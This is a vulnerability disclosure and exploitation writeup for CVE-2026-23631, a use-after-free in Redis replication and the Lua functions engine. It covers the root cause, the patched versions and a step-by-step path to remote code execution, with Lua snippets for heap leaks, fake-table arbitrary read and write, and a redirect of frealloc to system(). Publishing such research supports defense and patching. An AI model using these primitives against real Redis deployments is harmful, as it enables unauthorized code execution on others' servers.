
In December 2025, I participated in the ZeroDay.Cloud 2025 competition in London. I decided to target Redis (post authentication), due to its complexity and large and interesting attack surface. During my research, I found DarkReplica (CVE-2026-23631) — a post-authentication Use-After-Free vulnerability in the replication subsystem of Redis server. The vulnerability involves assigning the target server as an attacker-controlled server's "slave" (using the SLAVEOF command), and then abusing a logic flaw in the synchronization process, which leads to a Use-After-Free (UAF) scenario in the Lua functions engine.
This writeup describes the root cause of the vulnerability, as well as the exploitation journey until achieving Remote Code Execution.
Remediation
Redis patched the bug on May 5, 2026. The fix was shipped across all five maintained release series.
| Release series | Affected versions | Fixed version |
|---|---|---|
| Redis 7.2.x | 7.2.0 – 7.2.13 | 7.2.14 |
| Redis 7.4.x | 7.4.0 – 7.4.8 | 7.4.9 |
| Redis 8.2.x | 8.2.0 – 8.2.5 | 8.2.6 |
| Redis 8.4.x | 8.4.0 – 8.4.2 | 8.4.3 |
| Redis 8.6.x | 8.6.0 – 8.6.2 | 8.6.3 |
Background
Redis's Built-In Lua Engine(s)
One of the most promising attack surfaces of Redis is the Lua engine. Redis includes a built-in Lua engine that allows developers to execute atomic functions on the server that can manipulate data. The Lua interpreter itself is a forked Lua 5.1 engine with some modifications made by Redis developers. Of course, Lua code runs in a sandboxed Lua environment in order to prevent remote code execution. In fact, Redis does not contain just one Lua engine, but two separate ones:
The scripting engine (SCRIPT LOAD/EVAL/EVALSHA/…)
The older model. It allows running scripts and storing them on the server, and then calling them again using their SHA1 hash. It also contains "LDB" (SCRIPT DEBUG), which is a Lua debugger implemented by Redis on top of Lua hooks.
127.0.0.1:6379> SCRIPT LOAD "return KEYS[1] .. ' ' .. ARGV[1]"
"406bf0497c622efb466704c62042f34776db84b7"
127.0.0.1:6379> EVALSHA 406bf0497c622efb466704c62042f34776db84b7 1 Hello World
"Hello World"
The functions engine (FUNCTION LOAD/FCALL/…)
The newer model. It allows registering libraries containing functions, which are then callable by name using FCALL. The functions engine has a generic design, and might support other scripting languages in the future. Currently, only Lua 5.1 is supported. Functions are also permanent (stored in RDB/AOF files, and also get synced with other cluster nodes), compared to scripts, which are only stored in memory.
127.0.0.1:6379> FUNCTION LOAD "#!lua name=mylib \n redis.register_function('myfunc', function(keys, argv) return keys[1] .. ' ' .. argv[1] end)"
"mylib"
127.0.0.1:6379> FUNCTION LIST
1) 1) "library_name"
2) "mylib"
3) "engine"
4) "LUA"
5) "functions"
6) 1) 1) "name"
2) "myfunc"
3) "description"
4) (nil)
5) "flags"
6) (empty array)
127.0.0.1:6379> FCALL myfunc 1 Hello World
"Hello World"
127.0.0.1:6379> FUNCTION FLUSH
OK
127.0.0.1:6379> FUNCTION LIST
(empty array)
For the sake of this writeup, I am going to focus specifically on the functions engine, but remember the scripting engine for later.
Vulnerability Root Cause Analysis
Slow Scripts
When executing arbitrary Lua code, an issue might arise: what if the code has some bug that makes it run for a very long time (or even forever)? Since Redis is a single-threaded server, this would block the server completely and deny service to other users. This is where FUNCTION KILL comes into play. After 5 seconds of executing a function, Redis prints the following log line:
1:S 33 Jul 2025 13:37:13.337 # Slow script detected: still in execution after 5000 milliseconds. You can try killing the script using the FUNCTION KILL command. Script name is: scam.
This Redis command kills the currently executing function. An attentive reader might now ask: "Wait, you said that Redis is single-threaded! So how will it handle the FUNCTION KILL command while it's blocked?". Well, this is why Redis installs a custom Lua hook function before executing the user script:
lua_sethook(lua, luaMaskCountHook, LUA_MASKCOUNT, 100000);
static void luaMaskCountHook(lua_State *lua, lua_Debug *ar) {
if (scriptInterrupt(rctx) == SCRIPT_KILL) {
// ...
}
}
int scriptInterrupt(scriptRunCtx *run_ctx) {
if (run_ctx->flags & SCRIPT_TIMEDOUT) {
/* script already timedout
we just need to process some events and return */
processEventsWhileBlocked();
return (run_ctx->flags & SCRIPT_KILLED) ? SCRIPT_KILL : SCRIPT_CONTINUE;
}
// ...
}
This hook executes every 100K Lua instructions. It checks if the function has timed out (by default — 5 seconds), and then calls processEventsWhileBlocked(), which handles pending events (for example, I/O events) from the Redis event loop. This is how the server is able to handle other connections while a Lua function is blocking it.
This opens a door to many potential issues. For example: what if someone calls the FUNCTION FLUSH command while a slow function is running? Wouldn't it cause the server to release all Lua functions while one of them is being executed? Fortunately, Redis developers did see that coming:
int processCommand(client *c) {
// ...
/* when a busy job is being done (script / module)
* Only allow a limited number of commands. */
if (isInsideYieldingLongCommand() && !(c->cmd->flags & CMD_ALLOW_BUSY)) {
// ...
rejectCommand(c, shared.slowscripterr);
// ...
}
// ...
}
There are only a few specific commands (including FUNCTION KILL and SCRIPT KILL) that can be executed during a timed-out function execution. When you try to execute a non-whitelisted command, you get the following error back:
(error) BUSY Redis is busy running a script. You can only call FUNCTION KILL or SHUTDOWN NOSAVE.
The Loophole
An interesting fact is that processEventsWhileBlocked() handles not only I/O events from regular clients, but all I/O events. So if the Redis server is a "slave" in the cluster, commands sent from the master server will also be handled! And there, nothing checks if a function is currently executing before performing state-changing operations.
Redis Replication
Redis allows assigning a "master server" to another server (using the SLAVEOF command). The slave server connects to the master and receives updates and full/partial synchronizations, in order to sync the full state of the server. The master can issue a PSYNC/FULLRESYNC with the slave at any given time, and then provide an RDB file (Redis's data serialization and storage format) that the slave will write locally and load.
RDB Structure
RDB is a fairly simple protocol. It contains a list of records, where each has an "opcode" and data in some specific structure according to the opcode. These are the supported RDB record types:
/* Special RDB opcodes (saved/loaded with rdbSaveType/rdbLoadType). */
#define RDB_OPCODE_SLOT_INFO 244 /* Individual slot info, such as slot id and size (cluster mode only). */
#define RDB_OPCODE_FUNCTION2 245 /* function library data */
#define RDB_OPCODE_FUNCTION_PRE_GA 246 /* old function library data for 7.0 rc1 and rc2 */
#define RDB_OPCODE_MODULE_AUX 247 /* Module auxiliary data. */
#define RDB_OPCODE_IDLE 248 /* LRU idle time. */
#define RDB_OPCODE_FREQ 249 /* LFU frequency. */
#define RDB_OPCODE_AUX 250 /* RDB aux field. */
#define RDB_OPCODE_RESIZEDB 251 /* Hash table resize hint. */
#define RDB_OPCODE_EXPIRETIME_MS 252 /* Expire time in milliseconds. */
#define RDB_OPCODE_EXPIRETIME 253 /* Old expire time in seconds. */
#define RDB_OPCODE_SELECTDB 254 /* DB number of the following keys. */
#define RDB_OPCODE_EOF 255 /* End of the RDB file. */
RDB Functions Synchronization
As you might guess, I chose to focus on the RDB_OPCODE_FUNCTION2 opcode. The slave should always sync its functions and libraries with the master. So for each defined Lua "library" in the master, a record with opcode RDB_OPCODE_FUNCTION2 is sent to the slave together with the relevant Lua code. The slave immediately loads it:
} else if (type == RDB_OPCODE_FUNCTION2) {
sds err = NULL;
if (rdbFunctionLoad(rdb, rdbver, rdb_loading_ctx->functions_lib_ctx, rdbflags, &err) != C_OK) {
serverLog(LL_WARNING,"Failed loading library, %s", err);
sdsfree(err);
goto eoferr;
}
continue;
}
Under normal circumstances, when performing a FULLRESYNC, emptyData() will be called to empty the server before loading the new RDB. It will then call functionsLibCtxClearCurrent(), which will free the current functions context and related objects, and initialize a new one:
void functionsLibCtxClearCurrent(int async) {
if (async) {
functionsLibCtx *old_l_ctx = curr_functions_lib_ctx;
dict *old_engines = engines;
freeFunctionsAsync(old_l_ctx, old_engines);
} else {
functionsLibCtxFree(curr_functions_lib_ctx);
dictRelease(engines); // <-------
}
functionsInit();
}
/* Free the given functions ctx */
void functionsLibCtxFree(functionsLibCtx *functions_lib_ctx) {
functionsLibCtxClear(functions_lib_ctx);
dictRelease(functions_lib_ctx->functions);
dictRelease(functions_lib_ctx->libraries);
dictRelease(functions_lib_ctx->engines_stats);
zfree(functions_lib_ctx);
}
The dictRelease(engines) call will free() the current lua_State object (the global Lua interpreter object)! Then, the new functions from the RDB will be loaded into the newly initialized functions context. When loading an RDB_OPCODE_FUNCTION2, rdb_loading_ctx->functions_lib_ctx (the server functions context) is not the global context, but a new one. At the end of the RDB load, the global context will be replaced with the new one.
After returning from processEventsWhileBlocked(), our Lua function will continue running, but now with a completely freed Lua engine.
Triggering the Vulnerability
So the plan is as follows:
- Register a slow Lua function (
while 1 end) - Make the server a slave of our master server (
SLAVEOF). The server will start connecting to us "in the background". - Disable the (automatically set)
slave-read-onlyconfig option (usingCONFIG SET) — this allowsFCALLto execute once the server enters slave mode. - Execute our slow Lua function.
- 5 seconds later, the script will timeout and the server will continue receiving events from our master server. Initiate a
FULLRESYNC. - The functions Lua engine (including the
lua_Stateitself) will get freed. - Execution will return to our slow function.
- UAF!
Sure enough, we get a beautiful crash dump:
1:S 33 Jul 2025 13:37:13.337 * Before turning into a replica, using my own master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.
1:S 33 Jul 2025 13:37:13.337 * Connecting to MASTER 172.18.0.1:8474
1:S 33 Jul 2025 13:37:13.337 * MASTER <-> REPLICA sync started
...
1:S 33 Jul 2025 13:37:13.337 # Slow script detected: still in execution after 5000 milliseconds.
...
=== REDIS BUG REPORT START: Cut & paste starting from here ===
1:S 33 Jul 2025 13:37:13.337 # Redis 8.4.0 crashed by signal: 11, si_code: 128
1:S 33 Jul 2025 13:37:13.337 # Accessing address: (nil)
1:S 33 Jul 2025 13:37:13.337 # Crashed running the instruction at: 0x648a03093f37
Exploitation
The primitive we achieved is executing a Lua function, while it, its state, its "stack", and every object that is related to it are all freed! While this is a very strong primitive, it also has a very chaotic nature. The lua_State is a fairly complex object with references to many other objects (of various sizes). A very strong heap control is necessary in order to allocate all of these objects in the exact right way for the program not to accidentally crash at some point.
Furthermore, there are objects that we just cannot fake without requiring some more primitives. For example, every Lua operation that involves allocating memory calls lua_State->l_G->frealloc(), which is basically a custom malloc() callback. We still do not have an ASLR leak, so we cannot write a valid pointer to executable memory there.
The Lua VM
Before we dive into the exploitation itself, we have to first introduce some core concepts of the Lua VM.
Lua has its own bytecode format that runs in a register-based VM. It also has a stack that contains called functions, arguments to functions, local variables, and the "registers" themselves (which are just dedicated positions on the function stack frame). Every Lua bytecode instruction manipulates some variables on the stack. For example:
ADD R2 R0 R1takes 2 numbers from stack positions 0 and 1, adds them and stores the result in stack position 2 (R2 = R0 + R1).CALL R1 5 4calls the function at stack position 1, with the arguments from stack positions 2 (func+1) to 5 (func+5-1), and expects to receive 3 return values on stack positions 1 (func) to 3 (func+4-2). In addition, a Lua function also has a constant list referenceable by instructions usingK1,K2, ...
Lua 5.1 also features an incremental GC implementation, which we won't dive into, as it's not directly relevant to our exploit.
Primitives
Returning to our exploitation strategy; besides the UAF primitive, we also have some small memory primitives that can help us later.
Heap Address Leakage
Fortunately for us, Lua's default tostring() function returns pointers for values which are not strings or numbers!
tostring({})
-- table: 0x634b5724c340
This is, in fact, a pointer to the GCObject structure, which is a union that can represent all existing Lua object types.
typedef struct lua_TValue {
Value value;
int tt; // type
} TValue;
typedef union {
GCObject *gc;
void *p;
lua_Number n; // for number values
int b;
} Value;
union GCObject {
GCheader gch; // GC header
union TString ts; // for string values
union Udata u; // for userdata values
union Closure cl; // for function values
struct Table h; // for table values
struct Proto p; // for function prototypes
struct UpVal uv; // for function upvals
struct lua_State th; // for "threads" (coroutines)
};
malloc()
We can build a malloc() primitive — the ability to allocate an arbitrary string in memory and know its address.
The tostring() function does not return a pointer for string values. The default allocator for Redis is Jemalloc, and as a result of its tcache implementation (and thanks to Redis being single-threaded), when we free() an object and then malloc() an object of the same size class, we will deterministically get the same address back.
local a = coroutine.create(function() end) -- Allocates a coroutine
local addr = tostring(a) -- Saves the address for its lua_State object (size 184)
a = nil -- Removes the reference to the coroutine object
collectgarbage("collect") -- Triggers the GC, which will free the lua_State object
a = "AAAAAA..." .. "A" -- Allocates a string with our payload of size 184 - sizeof(TString) (the string header)
-- Our buffer is now allocated in the same address as the freed coroutine (which we know) + sizeof(TString)
We use CONCAT (..) in order to allocate the string when we need it, otherwise it would just be saved as a function constant at compilation time and wouldn't get allocated again.
Because the functions engine is about to be freed, we use the separate Lua scripting engine (remember?) in order to allocate our objects, and then turn its GC off to prevent it from releasing our objects.
After allocating on top of the vulnerable freed lua_State, this primitive will also allow us to control the whole "tree of objects" (control other objects it references), since we can now write data to the heap at known addresses.
Allocating the Freed Buffers
We need to "spray" the heap in order to allocate on top of the just-freed objects. Redis has a separate Jemalloc arena for Lua scripts, which means only Lua objects can "exploit" our UAF. Fortunately for us, the next thing that happens after freeing the Lua engine is, conveniently, loading our RDB. As explained above, our RDB can contain RDB_OPCODE_FUNCTION2 records which contain Lua function registration code that will get executed immediately. This script is controlled by us and can allocate objects in order to spray the heap and allocate on top of the freed objects we need.
Taking Control Over the Lua VM
So now we have everything we need. Let's allocate on top of the freed lua_State!
Another issue arises: remember what we said about Jemalloc's tcache? The next object that gets allocated right after freeing the old engine's lua_State is the new one. As expected, it deterministically gets allocated on top of the old one. :(
To work around this issue, we can abuse Lua coroutines — Lua's implementation of "threads", which are not really threads, but more like function generators that can be resumed, pause execution in the middle, and yield results.
local co = coroutine.create(function(x)
for i = 1, x do
coroutine.yield(i)
end
end)
local success, a = coroutine.resume(co, 5)
print(a) -- 1
success, a = coroutine.resume(co)
print(a) -- 2
-- ...
What's interesting here is that every coroutine is running in its own lua_State. So if we run our slow function (the one that gets freed) inside of a coroutine, after the new engine's lua_State object will malloc() on top of the old one, we will still be able to allocate on top of the coroutine's lua_State and take control of the function's Lua VM.
#!lua name=mylib
redis.register_function("hoax", function()
co = coroutine.create(function(a)
-- This function runs in a separate lua_State
while 1 do end
end)
coroutine.resume(co)
end)
Stabilizing the VM
We can now execute arbitrary Lua opcodes in a custom Lua environment with our own fake objects on the stack. We are getting close.
The next issue is that we are very limited in what we can actually do without crashing the program, because of various constraints (e.g., the frealloc() issue explained above). "Stabilizing" the VM will help us a lot. For that, we can use another trick related to Lua coroutines.
Let's build the following Lua stack layout:
[0] LUA_TFUNCTION - coroutine.resume
[1] LUA_TTHREAD - stage3_co
[2] LUA_TTABLE - fakeobj1
[3] LUA_TTABLE - fakeobj2
...
- We can know
coroutine.resume's address by runningtostring(coroutine.resume). stage3_cois a coroutine we allocate beforehand, which runs our function (we can also know a coroutine's address by using the same address leak primitive).- We execute both in the separate scripting engine, so it won't get freed!
Then, we can execute the following single Lua instruction:
CALL R0 4 1
This will execute coroutine.resume(stage3_co, fakeobj1, fakeobj2). Then, our function will continue execution in the (non-freed) coroutine's lua_State, while receiving our arbitrary fake objects as arguments!
We've just transferred our fake Lua objects from the "broken" Lua engine to another clean Lua engine!
Achieving a Write-What-Where Primitive
Now we can run Lua code in a fully functional environment and build fake objects. So, what objects can we fake? Let's take a look at the "table" (Lua's dictionary type) internal structures:
typedef struct Table {
CommonHeader;
lu_byte flags; /* 1<<p means tagmethod(p) is not present */
int readonly;
lu_byte lsizenode; /* log2 of size of `node' array */
struct Table *metatable;
TValue *array; /* array part */
Node *node;
Node *lastfree; /* any free position is before this position */
GCObject *gclist;
int sizearray; /* size of `array' array */
} Table;
In Lua, the table type is actually usable as both an array and a dictionary. Elements with a number index are stored in the Table->array array, and Table->sizearray represents its size. If we set array to 0x4141414141414141 and sizearray to 1, executing fake_table[1] = 1337 (Note: Lua indexes start at 1) will copy the number's TValue to Table->array[0] — in our case, the controlled address 0x4141414141414141!
typedef struct lua_TValue {
Value value;
int tt; // type
} TValue;
typedef union {
GCObject *gc;
void *p;
lua_Number n; // for number values
int b;
} Value;
typedef double lua_Number;
For the Lua number type, TValue->tt == LUA_TNUMBER and TValue->value.n is the actual number (represented as a double).
We can build the following memory layout:
fake_table1:
array: 0
sizearray: 1
fake_table2:
array: &fake_table1->array
sizearray: 1
Then, execute the write primitive twice:
- First,
fake_table2[1] = addr(usingfake_table2to overwritefake_table1->arraywithaddr) - And then,
fake_table1[1] = value— this will writevaluetoaddr! (Note: it will also copyTValue->tt(LUA_TNUMBER) to addr+8)
local function write(addr, val)
fake_table2[1] = uint64_to_double(addr) -- Override fake_table1's array pointer
fake_table1[1] = uint64_to_double(val)
end
Achieving an Arbitrary Read Primitive
Executing local a = fake_table1[1] from Lua code will attempt to read a TValue from a given address and copy it to a local variable. The issue is it will also copy addr+8 (which is an arbitrary value) as the value type. We need the value to be LUA_TNUMBER in order to be able to read it as a number from Lua code.
So… let's fake some more tables!
fake_table3_array:
- value: 0
tt: 0
fake_table3:
array: &fake_table3_array
fake_table4:
array: &fake_table3->array[0].tt
Instead of assigning to a local variable, we can do fake_table3[1] = fake_table1[1]. This will copy the value we want to read to fake_table3_array->value and some random value to fake_table3_array->tt. Then, we do fake_table4[1] = 3, which will "fix" the type to be LUA_TNUMBER (since fake_table4->array points directly at fake_table3_array->tt). Now, we can just read fake_table3[1] as usual and get the value:
local function read(addr)
fake_table2[1] = uint64_to_double(addr) -- Override fake_table1's array pointer
fake_table3[1] = fake_table1[1] -- Read the value with a broken type to fake_table3[1]
fake_table4[1] = uint64_to_double(3) -- Fix fake_table3[1]'s type to be LUA_TNUMBER
local val = fake_table3[1] -- Read val as a double from fake_table3!
val = double_to_buf(val) -- Convert it to a buf to get raw data
return val
end
Achieving Code Execution
Now that we have a Lua function running in a stable VM with memory read/write capability and addresses of Lua heap objects, the path to code execution is quite trivial.
We have endless paths to proceed with. My two favorites are:
- Override
lua_State->errorJmp, which is ajmp_bufthat Lua jumps to when a Lua error is thrown, in order to revert the stack back to the most recent protected call. We can override it and then throw an error, and then we will achieve control ofripandrsp(and some more registers), which we can trivially use to run a ROP chain. - Override
lua_State->l_G->frealloc, which is atypedef void * (*lua_Alloc) (void *ud, void *ptr, size_t osize, size_t nsize). This is Lua'smalloc()/free()callback, which will be called the next time Lua allocates/frees/reallocates an object. Furthermore, its first argument islua_State->l_G->ud, which is great for us. We get a function call primitive with a controlled first argument. For the current exploit, I've decided to go with the function call path in order to reduce the exploit complexity and minimize the chance of crashing in the competition.
We still do not have libc pointers, so we cannot calculate its ASLR offset. The redis-server binary does not contain a plt stub for system(). Instead, we can just:
- Read the address from
umask@got.plt(whichredis-serverdoes have), and get libc'sumaskaddress. - Subtract
umask's relative address to get libc's ASLR offset. - Add
system's relative address to getsystem's address. - Create a new coroutine (which will run in a separate
lua_State). - Leak its address.
- Assign its
lua_State->l_G->frealloctosystem. - Assign its
lua_State->l_G->udto a pointer to our payload command string. - Resume the coroutine.
- The next time it attempts to allocate memory, it will call
system()with our command. :)
local os_clock = read(toaddr(os.clock) + offsetof(CClosure, f), true) -- Read address of a C function in the redis-server binary
local redis_server_base = os_clock - offsets["redis-server"]["os_clock"]
local umask_got = redis_server_base + offsets["redis-server"]["umask@got.plt"]
local umask = read(umask_got, true)
local libc_base = umask - offsets["libc"]["umask"]
local system = libc_base + offsets["libc"]["system"]
local fake_l_G = malloc_184()
write(fake_l_G + offsetof(global_State, frealloc), system)
write(fake_l_G + offsetof(global_State, ud), command_payload_addr)
-- ...some more writes...
local co = coroutine.create(function() end)
local co_addr = toaddr(co)
write(co_addr + offsetof(lua_State, l_G), fake_l_G)
-- ...some more writes...
coroutine.resume(co) -- Executes system()!
Conclusions
In this writeup, we walked through Redis's Lua engines and replication subsystem, some of the Lua 5.1 engine's internals, the root cause of the DarkReplica vulnerability, and the full exploitation path to achieve Remote Code Execution.
The vulnerability abuses a logic flaw in Redis's replication process, and demonstrates the complexity of achieving "concurrency" in complicated software with a lot of moving parts. The exploit itself also includes some powerful generic Lua VM exploitation primitives and techniques.
DarkReplica was submitted to the ZeroDay.Cloud 2025 competition in London, where it was awarded $30,000.
Redis patched this vulnerability in version 8.6.3. Patch your instance ASAP.
The full exploit code can be found here.
How Wiz Can Help
Wiz customers can use the pre-built query and advisory in the Wiz Threat Center to assess the risk in their environment.
Wiz identifies both internal and publicly exposed Redis instances in your environment affected by CVE-2026-23631, and alerts you to instances that have been misconfigured to allow unauthenticated access or use weak or default passwords.
Timeline
- Dec 10-11, 2025: Vulnerability discovered and demonstrated at ZeroDay.cloud 2025 by Yoni Sherez.
- May 5, 2026: Fix shipped in Redis 7.2.14, 7.4.9, 8.2.6, 8.4.3, and 8.6.3.
- May 5, 2026: CVE-2026-23631 published.